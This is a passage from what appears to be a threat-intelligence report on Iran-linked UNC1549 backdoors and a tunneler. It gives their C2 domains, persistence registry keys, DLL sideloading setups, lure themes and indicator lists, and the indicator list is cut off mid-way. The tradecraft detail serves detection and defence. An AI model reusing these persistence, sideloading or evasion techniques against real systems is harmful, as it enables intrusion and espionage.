<p>This might make the MINIBUS platform a more suitable option for an experienced operator, which instead of using ready-to-use features may require a more flexible platform. Such an operator may be concerned with operational security (OpSec), possibly as an early stage in a more elaborate  operation.</p>
<p>The following is a more detailed list of the key differences between the MINIBIKE and MINIBUS platforms.</p>
<h3>Functionality</h3>
<ul>
<li>MINIBUS has fewer built-in commands and features when compared with MINIBIKE. Instead, MINIBUS provides a more flexible code-execution and command interface, including the ability to run an executable (for example, a possible next-stage implant) using a single command, unlike MINIBIKE.</li>
<li>MINIBUS has a process enumeration feature. A process list generated by MINIBUS may be useful to avoid detection, for example, by identifying processes related to Virtual Machine (VM) utilities or security applications (such as an EDR). </li>
</ul>
<h3>Export DLL Names</h3>
<p>The MINIBUS bundle contains DLLs with the names “torvaldinitial.dll” for its launcher/installer and “torvaldspersist.dll” for its payload, unlike MINIBIKE, which utilizes export DLL names like “Dr2.dll” or “MspUpdate.dll”  (for its launchers) and “Mini-Junked.dll” or “Micro.dll” (for its payloads).</p>
<h3>C2 Communication</h3>
<p>MINIBUS uses a combination of an Azure subdomain and unique *.com domains for C2 communications, unlike MINIBIKE, which relies only on Azure infrastructure.</p>
<h3>Lures and Themes</h3>
<p><strong>MINIBUS deployed lures related to the Israel-Hamas war</strong>, including a fake .NET application with themes and contents abusing the “Bring Them Home Now” movement, which calls for the return of the Israeli hostages kidnapped by Hamas. In another MINIBUS instance, Mandiant observed a lure related to Quizora, possibly referring to a quiz application.</p>
<h3>Targeting and Geography</h3>
<p>Like MINIBIKE, Mandiant observed MINIBUS targeting <strong>Israel and possibly India and the UAE</strong>. In addition, a MINIBUS C2 domain (cashcloudservices[.]com) had a subdomain with the prefix ns<u>albania</u>hack[.]*, suggesting <strong>an interest in Albania</strong> as well, which is consistent with Iran interests but not yet observed in a MINIBIKE-related activity.</p>
<h2>LIGHTRAIL: Highway to Where?</h2>
<p>In addition to the MINIBIKE and MINIBUS backdoors, Mandiant observed a tunneler named LIGHTRAIL likely affiliated with UNC1549 as well.</p>
<p>LIGHTRAIL has several connections to MINIBIKE and MINIBUS in the form of (1) a shared code base, (2) Azure C2 infrastructure with similar patterns and naming, and (3) overlapping targets and victimology.</p>
<p>LIGHTRAIL communicates with an Azure C2 subdomain of the form <em>*[.]*[.]cloudapp[.]azure[.]com</em>. Mandiant assesses with medium confidence that both LIGHTRAIL and MINIBIKE were used to target the same victim environment at least once.</p>
<p>LIGHTRAIL likely leverages the open-source utility <a href="https://github.com/codewhitesec/Lastenzug" rel="noopener" target="_blank"><u>“Lastenzug”</u></a> (“freight train” in German), a Socks4a proxy based on websockets with a “static obfuscation on [the] assembly level.” LIGHTRAIL’s export DLL is named “lastenzug.dll,” and it shares the same hard-coded User Agent as Lastenzug.</p>
<ul>
<li>Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136</li>
</ul>
<p>Mandiant observed two LIGHTRAIL versions used at least since November 2022. Similarly to MINIBIKE, no “official” versions were embedded in LIGHTRAIL’s code, but the instances can be divided to two versions.</p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Ver.</strong></p>
</td>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>Changes (Compared to Earlier Version)</strong></p>
</td>
<td>
<p><strong>Geographies</strong></p>
</td>
<td>
<p><strong>Example MD5</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>1.0</span></p>
</td>
<td>
<p><span>November 2022</span></p>
</td>
<td>
<p><span>- C2 domains: tnlsowki[.]westus3[.]cloudapp[.]azure[.]com</span></p>
<p><span>tnlsowkis[.]westus3[.]cloudapp[.]azure[.]com</span></p>
<p><span>- Export DLL named “lastenzug.dll”, likely referring to the </span><a href="https://github.com/codewhitesec/Lastenzug" rel="noopener" target="_blank"><span>open-source</span></a><span> Socks4a proxy</span></p>
</td>
<td>
<p><span>Turkey</span></p>
</td>
<td>
<p><span>36e2d9ce19ed045a<br>9840313439d6f18d</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2.0</span></p>
</td>
<td>
<p><span>August 2023</span></p>
</td>
<td>
<p><span>- C2 domain: iaidevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</span></p>
<p><span>- Export DLL named “</span><strong>L</strong><span>astenzug.dll” (capital ‘L’)</span></p>
<p><span>- String obfuscation, similar to MINIBIKE</span></p>
</td>
<td>
<p><span>Israel</span></p>
</td>
<td>
<p><span>a5fdf55c1c50be47<br>1946de937f1e46dd</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h2>Credential Harvesting and Fake Job Offers</h2>
<p>Mandiant observed that several websites hosting MINIBIKE payloads also hosted fake login pages in mid-2023 posing as job offers on behalf of legitimate defense and technology-related companies. More specifically, the companies were affiliated with the  aerospace, aviation, and thermal imaging industries.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig3-fig6.max-1000x1000.png" alt="Fake login page masquerading as the aerospace company Boeing">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 6: Fake login page masquerading as the aerospace company Boeing</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig7.max-1000x1000.png" alt="Fake login page masquerading as Teledyne FLIR, a manufacturer of thermal imaging devices">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 7: Fake login page masquerading as Teledyne FLIR, a manufacturer of thermal imaging devices</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>In addition, Mandiant observed suspected UNC1549 infrastructure hosting job description documents for positions in DJI,  a drone manufacturing company, in parallel to a MINIBIKE .zip file. </p>
<p>The documents were likely used as lures in social engineering efforts, either for running malicious files or harvesting credentials.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig5-fig8.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 8: Fake DJI job offer (MD5: 4a223bc9c6096ac6bae3e7452ed6a1cd)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig9.max-1000x1000.png" alt="Fake DJI job offer">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 9: Fake DJI job offer (MD5: ec6a0434b94f51aa1df76a066aa05413)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Technical Appendix</h2>
<h3>MINIBIKE Technical Analysis</h3>
<p>Mandiant observed the following versions of MINIBIKE deployed since 2022.</p>
<h4>Version 1.x, June–November 2022</h4>
<ul>
<li><strong>Payload:</strong> IMG archive named <em>Screenshot.img</em> (example MD5: 409c2ac789015e76f9886f1203a73bc0), containing the following files:
<ul>
<li>Screenshots.lnk - a launcher LNK file (MD5: cb565b1bb128dfc20c8392974ff73e3f)</li>
<li>Setup.exe - a legitimate OneDrive/SharePoint executable (MD5: 400d7190012517677dd5ef2e471f2cd1)</li>
<li>secur32.dll - the MINIBIKE launcher, executed via search-order-hijacking (SoH) (MD5: 54848d17aa76d807e2fd6d196a01ce84)</li>
<li>configur.dll - the MINIBIKE backdoor (MD5: e9ed595b24a7eeb34ac52f57eeec6e2b)</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: Most of the following analysis refers to version 1.0, but version 1.1 behaves in a similar manner.</p>
<ul>
<li><strong>Execution:</strong> once the IMG archive is mounted, the malicious launcher is executed via SoH and copies the legitimate executable and the MINIBIKE backdoor to the following paths:
<ul>
<li><strong>Legitimate executable: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\configs\FileCoAuth.exe</li>
<li><strong>MINIBIKE backdoor: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\configs\secur32.dll</li>
</ul>
</li>
<li><strong>Persistence:</strong> The loader/installer sets persistence for the MINIBIKE payload by moving it to its staging directory and setting the following Run registry key:
<ul>
<li><strong>Key:</strong> HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDriveFileCoAuth.exe</li>
<li><strong>Value:</strong> %LOCALAPPDATA%\Microsoft\OneDrive\configs\FileCoAuth.exe</li>
</ul>
</li>
<li><strong>Export DLL name:</strong>
<ul>
<li><strong>Version 1.0:</strong><em> “update.dll”</em></li>
<li><strong>Version 1.1:</strong><em><strong> </strong>“Mini.dll”</em></li>
</ul>
</li>
<li><strong>User Agent:</strong>
<ul>
<li><strong>Version 1.0:</strong><em> Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Mobile Safari/537.36</em></li>
<li><strong>Version 1.1:</strong><em><strong> </strong>Mozilla/5.0</em></li>
</ul>
</li>
<li><strong>C2 infrastructure: </strong>
<ul>
<li><strong>Version 1.0:</strong> <em>158.255.74[.]25</em></li>
<li><strong>Version 1.1:</strong><em> homefurniture[.]azurewebsites[.]net</em></li>
</ul>
</li>
<li><strong>C2 URIs:</strong>
<ul>
<li><strong>Version 1.0:</strong>
<ul>
<li><em>/api/blogs/96752</em> - initial beacon and request command</li>
<li><em>/api/blogs/result/96752 </em>- command/request response</li>
<li><em>/api/blogs/download/</em> - download file</li>
<li><em>/api/blogs/result/file/</em> - upload file</li>
</ul>
</li>
<li><strong>Version 1.1:</strong>
<ul>
<li><em>/news/notifications/235722</em> - initial beacon and request command</li>
<li><em>/news/update/ </em>- command/request response</li>
<li><em>/news/image/</em> - download file</li>
</ul>
</li>
</ul>
</li>
<li><strong>Affected geographies:</strong> UAE, Turkey, Iran</li>
</ul>
<h4>Version 2.x, August–October 2023</h4>
<ul>
<li><strong>Payload:</strong> ZIP archive, usually named <em>Survey.zip</em> (example MD5: 691d0143c0642ff783909f983ccb8ffd), containing the following files:
<ul>
<li>Setup.exe - a legitimate executable used to sideload the installer (MD5: ce1054d542dbd999401236f2ce20f826)</li>
<li>secur32.dll - The MINIBIKE backdoor - (MD5: 1e7cf4c172bdabe48714b402d2255707)</li>
<li>lang.dat - a MINIBIKE installer (MD5: 909a235ac0349041b38d84e9aab3f3a1)</li>
</ul>
</li>
<li><strong>Execution:</strong> once the legitimate executable is run, the MINIBIKE installer is sideloaded and the files are copied to the following paths:
<ul>
<li><strong>Legitimate executable:</strong> %LOCALAPPDATA%\Microsoft\Internet Explorer\FileCoAuth.exe</li>
<li><strong>MINIBIKE backdoor: </strong>%LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll</li>
</ul>
</li>
<li><strong>Persistence:</strong> The loader/installer sets persistence for the MINIBIKE payload by moving it to its staging directory and setting the following Run registry key:
<ul>
<li><strong>Key: </strong>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive FileCoAuth</li>
<li><strong>Value:</strong> %LOCALAPPDATA%\Microsoft\Internet Explorer\secur32.dll</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: Version 2.1 uses ‘Image Photo Viewer’ as a registry key</p>
<ul>
<li><strong>Export DLL name:</strong>
<ul>
<li><strong>Versions 2.0 and 2.1:</strong> <em>“Mini-Junked.dll”</em></li>
<li><strong>Version 2.2: </strong><em>“Micro.dll”</em></li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of “devobj.dll”</p>
<ul>
<li><strong>User Agent:</strong>
<ul>
<li><em><strong>Version 2.0: </strong></em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.180 (KHTML, like Gecko) Chrome/110.0.0.2 Safari/538.36 </em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.46</em></li>
</ul>
</li>
<li><em><strong>Version 2.1: </strong></em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.36</em></li>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/539.181 (KHTML, like Gecko) Chrome/111.0.0.2 Safari/538.46</em></li>
</ul>
</li>
<li><em><strong>Version 2.2:</strong> </em>
<ul>
<li><em>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36</em></li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of “Mozilla/5.0” user agent.</p>
<ul>
<li><strong>C2 infrastructure: </strong>This version of MINIBIKE communicates with three to five Azure subdomains. After every communication it uses the next C2 in a loop, for example:
<ul>
<li><em>blogvolleyballstatus[.]azurewebsites[.]net</em></li>
<li><em>blogvolleyballstatusapi[.]azurewebsites[.]net</em></li>
<li><em>marineblogapi[.]azurewebsites[.]net</em></li>
</ul>
</li>
<li><strong>C2 URIs: </strong>
<ul>
<li><strong>Versions 2.0 and 2.1:</strong>
<ul>
<li><em>/news/notifications/&lt;six_digits&gt;</em> - initial beacon and request command</li>
<li><em>/news/update/ </em>- command/request response</li>
<li><em>/news/image/</em> - download file</li>
</ul>
</li>
<li><strong>Version 2.2:</strong>
<ul>
<li><em>/assets/&lt;six_or_eight_digits&gt;/ {index.html / favicon.ico / icon.svg}</em> - initial beacon and request command</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/ </em>- command/request response</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/</em> - download file</li>
<li><em>/assets/&lt;six_or_eight_digits&gt;/</em> - upload file</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>Note</strong>: In a single instance Mandiant observed the use of URIs of the form: blogs/&lt;keywords&gt;</p>
<ul>
<li><strong>Affected geographies:</strong> Israel, UAE, and potentially India</li>
</ul>
<h3>MINIBUS Analysis</h3>
<ul>
<li><strong>Payload:</strong> ZIP archive named <em>bringthemhomenow.zip</em> (MD5: ef262f571cd429d88f629789616365e4), containing the following files:
<ul>
<li>BringThemeHome.exe - a benign executable (MD5: ce1054d542dbd999401236f2ce20f826)</li>
<li>A MINIBUS installer - secur32.dll (MD5: c5dc2c75459dc99a42400f6d8b455250)</li>
<li>CoreUIComponent.dll - the MINIBUS backdoor (MD5: 816af741c3d6be1397d306841d12e206)</li>
<li>essential.dat - an additional archive containing decoy content: a “Bring Them Home” fake .NET application created by  the threat actor (MD5: 251894b3af0ece374ed6df223ab09cab)</li>
</ul>
</li>
<li><strong>Execution:</strong> Once the legitimate executable is run, the MINIBUS installer is installed via search-order-hijacking (SoH). </li>
</ul>
<p>The installer DLL displays a message indicating the files are being extracted:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig10.max-1000x1000.png" alt="MINIBUS installer DLL installation message">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="mmsz9">Figure 10: MINIBUS installer DLL installation message</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>The decoy contents are moved to their intended location on the targeted system:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig11.max-1000x1000.png" alt="Installer DLL message box">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 11: Installer DLL message box</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Two main decoy files are contained within the ZIP archive along with some dependency files, essential.dat (MD5: 251894b3af0ece374ed6df223ab09cab):</p>
<ul>
<li>
<p>Decoy .NET application masquerading as an application related to Israeli hostages kidnapped by Hamas during the Oct. 7 attack on Israel: <em>&lt;extraction_directory&gt;\BringThemeHomeNow\BringThemeHomeNow.exe [sic] (MD5: dfed4468dd78ad2f5d762741df4c1755)</em></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig12.max-1000x1000.png" alt="Fake “Bring Them Home Now”.NET application “BringThemeHomeNow.exe” [sic]">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 12: Fake “Bring Them Home Now”.NET application “BringThemeHomeNow.exe” [sic]</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>Decoy image: <em>&lt;extraction_directory&gt;\BringThemeHomeNow\petition.jpg (MD5: c0060a0c26df9fed7fdcdb7d26ff921f)</em></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/minibike-fig4-fig13-blurred.max-1000x1000.png" alt="Decoy content used by MINIBUS, related to the “Bring Them Home Now” movement">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="dji4b">Figure 13: Decoy content "petition.jpg"</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p>Upon execution, the .NET application initially checks of the existence of a flag file that indicates if the decoy has previously run on the device: <em>%LOCALAPPDATA%\Commons\lg</em></p>
<p>If the file does not exist, a splash screen is displayed prior to entering the application. If the file already exists, the application presents the main screen (seen in Figure 12).</p>
<p>In addition to displaying decoy content to the victim, the installer DLL copies the backdoor and dependency files to their staging directory, and it also sets persistence for the backdoor using the following registry run key:</p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><em><strong>Key: </strong>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveCoUpdate</em></p>
<p><em><strong>Value: </strong>%LOCALAPPDATA%\Microsoft\OneDrive\cache\logger\FileCoAuth.exe</em></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><ul>
<li><strong>C2 infrastructure: </strong>This version of MINIBIKE communicates with one Azure subdomain and two dedicated domains:
<ul>
<li><em>vscodeupdater[.]azurewebsites[.]net</em></li>
<li><em>cashcloudservices[.]com</em></li>
<li><em>xboxplayservice[.]com</em></li>
</ul>
</li>
<li><strong>Affected geographies:</strong> Israel and India, as well as possibly UAE and Albania, based on the following subdomains of cashcloudservices[.]com:
<ul>
<li><em><strong>dubai-ae</strong>0043[.]cashcloudservices[.]com</em></li>
<li><em>ns<strong>albania</strong>hack[.]cashcloudservices[.]com</em></li>
</ul>
</li>
</ul>
<h3>Detection and Mitigation</h3>
<p>If you are a Google Chronicle Enterprise+ customer, Chronicle rules were released to your <a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><u>Emerging Threats</u></a> rule pack, and IOCs listed in this blog post are available for prioritization with <a href="https://cloud.google.com/chronicle/docs/detection">Applied Threat Intelligence</a>.  </p>
<h3>Indicators of Compromise (IOCs)</h3>
<h4>MINIBIKE</h4>
<ul>
<li>
<p>01cbaddd7a269521bf7b80f4a9a1982f</p>
</li>
<li>
<p>054c67236a86d9ab5ec80e16b884f733</p>
</li>
<li>
<p>1d8a1756b882a19d98632bc6c1f1f8cd</p>
</li>
<li>
<p>2c4cdc0e78ef57b44f11f7ec2f6164cd</p>
</li>
<li>
<p>3b658afa91ce3327dbfa1cf665529a6d</p>
</li>
<li>
<p>409c2ac789015e76f9886f1203a73bc0</p>
</li>
<li>
<p>601eb396c339a69e7d8c2a3de3b0296d</p>
</li>
<li>
<p>664cfda4ada6f8b7bb25a5f50cccf984</p>
</li>
<li>
<p>68f6810f248d032bbb65b391cdb1d5e0</p>
</li>
<li>
<p>691d0143c0642ff783909f983ccb8ffd</p>
</li>
<li>
<p>710d1a8b2fc17c381a7f20da5d2d70fc</p>
</li>
<li>
<p>75d2c686d410ec1f880a6fd7a9800055</p>
</li>
<li>
<p>909a235ac0349041b38d84e9aab3f3a1</p>
</li>
<li>
<p>a5e64f196175c5f068e1352aa04bc5fa</p>
</li>
<li>
<p>adef679c6aa6860aa89b775dceb6958b</p>
</li>
<li>
<p>bfd024e64867e6ca44738dd03d4f87b5</p>
</li>
<li>
<p>c12ff86d32bd10c6c764b71728a51bce</p>
</li>
<li>
<p>cf32d73c501d5924b3c98383f53fda51</p>
</li>
<li>
<p>d94ffe668751935b19eaeb93fed1cdbe</p>
</li>
<li>
<p>e3dc8810da71812b860fc59aeadcc350</p>
</li>
<li>
<p>e9ed595b24a7eeb34ac52f57eeec6e2b</p>
</li>
<li>
<p>eadbaabe3b8133426bcf09f7102088d4</p>
</li>
</ul>
<h4>MINIBUS</h4>
<ul>
<li>
<p>ef262f571cd429d88f629789616365e4</p>
</li>
<li>
<p>816af741c3d6be1397d306841d12e206</p>
</li>
<li>
<p>c5dc2c75459dc99a42400f6d8b455250</p>
</li>
<li>
<p>05fcace605b525f1bece1813bb18a56c</p>
</li>
<li>
<p>4ed5d74a746461d3faa9f96995a1eec8</p>
</li>
<li>
<p>f58e0dfb8f915fa5ce1b7ca50c46b51b</p>
</li>
</ul>
<h4>LIGHTRAIL</h4>
<ul>
<li>
<p>0a739dbdbcf9a5d8389511732371ecb4</p>
</li>
<li>
<p>36e2d9ce19ed045a9840313439d6f18d</p>
</li>
<li>
<p>aaef98be8e58be6b96566268c163b6aa</p>
</li>
<li>
<p>c3830b1381d95aa6f97a58fd8ff3524e</p>
</li>
<li>
<p>c51bc86beb9e16d1c905160e96d9fa29</p>
</li>
<li>
<p>a5fdf55c1c50be471946de937f1e46dd</p>
</li>
</ul>
<h4>Fake Job Offers</h4>
<ul>
<li>
<p>ec6a0434b94f51aa1df76a066aa05413</p>
</li>
<li>
<p>89107ce5e27d52b9fa6ae6387138dd3e</p>
</li>
<li>
<p>4a223bc9c6096ac6bae3e7452ed6a1cd</p>
</li>
</ul>
<h4>C2 and Hosting Infrastructure</h4>
<ul>
<li>
<p>1stemployer[.]com</p>
</li>
<li>
<p>birngthemhomenow[.]co[.]il</p>
</li>
<li>
<p>cashcloudservices[.]com</p>
</li>
<li>
<p>jupyternotebookcollections[.]com</p>
</li>
<li>
<p>notebooktextcheckings[.]com</p>
</li>
<li>
<p>teledyneflir[.]com[.]de</p>
</li>
<li>
<p>vsliveagent[.]com</p>
</li>
<li>
<p>xboxplayservice[.]com</p>
</li>
</ul>
<h4>Azure Subdomains</h4>
<ul>
<li>
<p>airconnectionapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>airconnectionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>airconnectionsapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>airgadgetsolution[.]azurewebsites[.]net</p>
</li>
<li>
<p>airgadgetsolutions[.]azurewebsites[.]net</p>
</li>
<li>
<p>altnametestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>answerssurveytest[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquestion[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>apphrquizapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>arquestionsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>arquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>audiomanagerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>audioservicetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>blognewsalphaapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>blogvolleyballstatusapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>blogvolleyballstatus[.]azurewebsites[.]net</p>
</li>
<li>
<p>boeisurveyapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckap[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>browsercheckjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestionstypeapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestionstypejsonapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestiontypesapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>changequestiontypes[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkapicountryquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkapicountryquestionsjson[.]azurewebsites[.]net</p>
</li>
<li>
<p>checkservicecustomerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>coffeeonlineshop[.]azurewebsites[.]net</p>
</li>
<li>
<p>coffeeonlineshoping[.]azurewebsites[.]net</p>
</li>
<li>
<p>connectairapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>connectionhandlerapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>countrybasedquestions[.]azurewebsites[.]net</p>
</li>
<li>
<p>customercareserviceapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>customercareservice[.]azurewebsites[.]net</p>
</li>
<li>
<p>emiratescheckapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>emiratescheckapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>engineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>engineeringssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>exchtestcheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>exchtestcheckingapihealth[.]azurewebsites[.]net</p>
</li>
<li>
<p>flighthelicopterahtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicopterahtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicopterahtests[.]azurewebsites[.]net</p>
</li>
<li>
<p>helicoptersahtests[.]azurewebsites[.]net</p>
</li>
<li>
<p>hiringarabicregion[.]azurewebsites[.]net</p>
</li>
<li>
<p>homefurniture[.]azurewebsites[.]net</p>
</li>
<li>
<p>hrapplicationtest[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapijson[.]azurewebsites[.]net</p>
</li>
<li>
<p>humanresourcesapiquiz[.]azurewebsites[.]net</p>
</li>
<li>
<p>iaidevrssfeed[.]centralus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeed[.]centrualus[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeed[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>iaidevrssfeedp[.]cloudapp[.]azure[.]com</p>
</li>
<li>
<p>identifycheckapplication[.]azurewebsites[.]net</p>
</li>
<li>
<p>identifycheckapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>identifycheckingapplications[.]azurewebsites[.]net</p>
</li>
<li>
<p>ilengineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognewfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognewsapi[.]azurewebsites[.]com</p>
</li>
<li>
<p>integratedblognewsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>integratedblognews[.]azurewebsites[.]net</p>
</li>
<li>
<p>intengineeringrssfeed[.]azurewebsites[.]net</p>
</li>
<li>
<p>intergratedblognewsapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntime[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimestestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimetestapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimeversioncheckingapi[.]azurewebsites[.]net</p>
</li>
<li>
<p>javaruntimeversionchecking[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookcollection[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookcollections[.]azurewebsites[.]net</p>
</li>
<li>
<p>jupyternotebookscollection[.]azurewebsites[.]net</p>
</li>
<li>
